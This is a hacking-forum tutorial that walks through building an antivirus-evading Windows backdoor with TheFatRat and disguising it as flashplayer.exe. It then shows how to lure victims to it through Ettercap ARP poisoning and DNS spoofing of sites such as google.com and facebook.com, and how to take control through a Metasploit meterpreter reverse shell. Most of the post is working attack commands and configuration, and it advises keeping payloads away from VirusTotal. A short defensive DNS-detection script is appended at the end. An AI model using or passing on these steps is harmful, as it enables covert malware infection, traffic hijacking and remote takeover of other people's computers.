
x32x01

ADMINISTRATOR

As you all know, Windows 10 is Microsoft's latest edition and has great security features, but what if someone sends a trojan/virus/backdoor/payload that is 100% FUD (Fully Undetectable)?

So basically, with the help of TheFatRat, you can easily develop a Trojan or backdoor and perform various post exploitation methods like Browser Hijacking, DDL Hacking, Windows Privilege Escalation etc and that generated payload will be 100% fully undetectable (FUD).

You can easily create a backdoor for Windows, Android and for Mac Operating system too. This tool will generate a payload in such a way that, it will bypass all Anti-Virus Software protection.

So with the help of Metasploit Framework, you can easily create a session between an attacker and a target.

The TheFatRat tool is developed in the C language, and viruses written in C won't be flagged by antivirus products.

Requirements
  • Kali Linux 2017.1 (Latest Version)
  • Metasploit Framework (Inbuilt Installed)
  • TheFatRat Package (Download it from Github)
Here is the complete scenario
  • Target Machine – Windows 10
  • Attacking Machine – Kali Linux 2017.1.
Installation
To install TheFatRat, you can use the GitHub repository; typing the command below will automatically download all of TheFatRat's files from GitHub.
Code:
git clone https://github.com/Screetsec/TheFatRat.git


After this completes, you need to run the setup.sh file. Before running setup.sh, change its permissions by typing the command below.
Code:
chmod +x setup.sh


In the next step, execute the setup.sh file directly by typing “./setup.sh”, which checks all dependencies and automatically installs any that are missing, as per the screenshot below.


Now you can simply type “fatrat” in your terminal and you’ll see a presented screen where it will show all the Menus from 01 to 16.


In next step, please type “6” to create a FUD(Fully Undetectable) Backdoor with Pwnwinds, which will create a .exe file.


After that, you need to type “2“, which will finally create a .exe file with the help of C# and Powershell.


Now you need to enter your local IP address, which you can check by typing the “ifconfig” command in another terminal. In our case, LHOST will be 192.168.179.143 and LPORT is 4444.

And after that you need to type the file name of the backdoor which it will create at the end.


In the last step, you need to assign the payload. You can choose any payload, but the best one is “windows/meterpreter/reverse_tcp”, selected by typing 3 as per the above screenshot.


Within a span of 1-2 minutes, it will create a backdoor with filename “flashplayer.exe” in the /TheFatRat/output directory.

Now we have created an executable. The target’s antivirus software will not have a signature for it until it’s added to the database, allowing us to bypass the target’s antivirus software.

Now that we have our payload, we need to set up a listener. Before setting up the listener, you need to start your Apache service so that you can poison your whole network with the help of Ettercap.

So, the steps are
  • Create a fake index.html page similar to “Adobe Flash Player Missing” and put your backdoor behind that page.
  • Start your Apache Service
  • Run Ettercap and start ARP poisoning.
  • Start the Listener with the help of Metasploit
To start the Apache service, please type below command:
Code:
service apache2 start


Now move to the /var/www/html directory, create an index.html file and place your backdoor file (flashplayer.exe) in the same directory.

Here’s the code which you can use to put in your index.html and don’t forget to change the link URL with your local interface IP address.


In the next step, we have to configure Ettercap, and for this you need to edit two files, i.e. etter.conf and etter.dns.

The default locations of the two files are /etc/ettercap/etter.conf and /etc/ettercap/etter.dns.

First open the etter.conf file with any text editor. Here we used gedit, so the command will be “gedit /etc/ettercap/etter.conf”. Edit two lines of code:

Set ec_uid and ec_gid to 0 if they are not already. Ettercap needs root privileges to configure interfaces; once that is done, it drops privileges, but to which user?

You specify that: 0 = root, 65535 = nobody.


In the same file, uncomment the four commented lines following the statements “if you use iptables” and “if you use ipchains” by removing the two bottom comment hashes you see below:


Now open the etter.dns file. In this step, we want to forward all requests to your LHOST IP address.

Your LHOST IP is 192.168.179.143, so the code is:

* A 192.168.179.143
*.google.com A 192.168.179.143
google.com A 192.168.179.143
google.co.in A 192.168.179.143
facebook.com A 192.168.179.143

This etter.dns file is the hosts file and is responsible for redirecting specific DNS requests. Basically, if the target enters facebook.com they will be redirected to Facebook’s website, but this file can change all of that. This is where the magic happens.


Now type “ettercap -G” in your terminal which opens Ettercap in Graphical Mode and start Unified sniffing.


Here you need to select the interface, in our case, we selected eth0. You can find out which interface is connected to the internet by typing in terminal ifconfig and seeing which interface gives you an IP address.


Now we want to scan for targets on our network and pick one. To do this, go to Hosts > Scan for hosts and wait until it does the scan. It should only take a few seconds depending on the size of your network.


So we’ve dealt with the scanning but how do we see our targets? Well, go back to Hosts and select Host list to see all the targets that Ettercap has found.


Now what we want to do is add our victim machine to Target 2 and our network gateway to Target 1 but first we need to know both of their IP addresses.

To find out our victim’s IP address, we first need to know who we are attacking, and we can do so using nmap to find the information we need on the target machine.


Once you are sure who your victim is, select their IP address from the host list in Ettercap and choose Add to Target 2.

Now you need to find your gateway IP address (your router). To do this, open Terminal and type route -n. Now select the gateway IP from the host list and choose Add to Target 1.

192.168.179.2 – Gateway – Add to Target 1
192.168.179.142 – Victim’s IP – Add to Target 2


Now that we have both Targets set to our victim and gateway, we can proceed to the attack.

Go to the MITM tab and select ARP poisoning.


Choose Sniff remote connections and press OK.


Now go to Plugins > Manage the plugins and double click dns_spoof to activate that plugin.


The final thing left to do here is to start the attack. Go back to Ettercap and select Start > Start sniffing and that should do it.

Now every time the victim visits any website, they will be redirected to the fancy and inconspicuous page below. You can see how this can be extremely malicious, since the attacker could write a script that fetches the requested page immediately and sets up the etter.dns file.


At the same time, we also need to set up a listener with the help of the Metasploit Framework. To do this, type “msfconsole” in your terminal, which opens the Metasploit Framework.


The exploit which we’ll use is “exploit/multi/handler” and to use this exploit, type below command.
Code:
use exploit/multi/handler


After that, you’ve to set the payload which is,
Code:
set payload windows/meterpreter/reverse_tcp


Now set your LHOST and LPORT to the same values you used while configuring TheFatRat, and finally run the exploit.

As you can see from the screen shots below, we now have a reverse connection with the target machine which is Windows 10 in our case.

Type “sysinfo” to see the information about the target.


To see all running processes in target’s machine, type “ps -ax“.


To see the backdoor’s process ID, type “getpid”. You can also enter Command Shell mode by just typing “shell”.


Here you see the prompt of Windows 10 machine.


To move the current session into background, type “background” in same terminal.


You can explore more meterpreter commands by typing “?” in the same terminal, which lists further commands that can be run against the target.

This is how we performed MITM attack with the help of TheFatRat, Ettercap and Metasploit Framework. This article is only for educational purposes, use at your own risk and please don’t upload any backdoor or payload to virustotal.com and if you really want to scan your backdoor, you can use nodistribute.com.

For more info about TheFatRat, please visit the GitHub link.
 

Attachments :

  • TheFatRat-Files-iTabCode.zip
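The etter.dns entries shown in the post point public names at a single LAN address, which gives defenders two simple signals in resolver logs: public names answering with non-routable addresses, and many unrelated names collapsing onto one IP. The following is an added example, not part of the original post, that checks for both. The records, the internal suffix list, the threshold and the function name are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed (query name, A-record answer) pairs, e.g. extracted from resolver logs.
RECORDS = [
    ("google.com.", "192.168.179.143"),
    ("www.google.com.", "192.168.179.143"),
    ("facebook.com.", "192.168.179.143"),
    ("printer.lan.", "192.168.179.20"),   # internal name, private answer is expected
    ("dns.google.", "8.8.8.8"),           # public name, public answer
]


def dns_findings(records, internal_suffixes=(".lan", ".local", ".internal"), fanin=3):
    """Return (private_hits, fan_in).

    private_hits: names outside the internal suffixes that resolved to a
                  non-global address (RFC 1918, loopback, link-local, ...).
    fan_in:       answer IPs that at least `fanin` distinct names resolved to.
    """
    private_hits = []
    names_by_ip = defaultdict(set)
    for qname, answer in records:
        name = qname.rstrip(".").lower()
        addr = ipaddress.ip_address(answer)
        names_by_ip[answer].add(name)
        if not addr.is_global and not name.endswith(internal_suffixes):
            private_hits.append((name, answer))
    fan_in = {ip: sorted(names) for ip, names in names_by_ip.items()
              if len(names) >= fanin}
    return private_hits, fan_in


if __name__ == "__main__":
    hits, fan_in = dns_findings(RECORDS)
    for name, ip in hits:
        print(f"public name {name} resolved to non-global address {ip}")
    for ip, names in fan_in.items():
        print(f"{len(names)} names resolve to {ip}: {', '.join(names)}")
```

Shared hosting and CDNs also produce fan-in on public addresses, so the private-address signal is the stronger of the two. Resolvers that validate DNSSEC or clients using DNS over TLS/HTTPS to a trusted resolver are not affected by this kind of on-path answer rewriting.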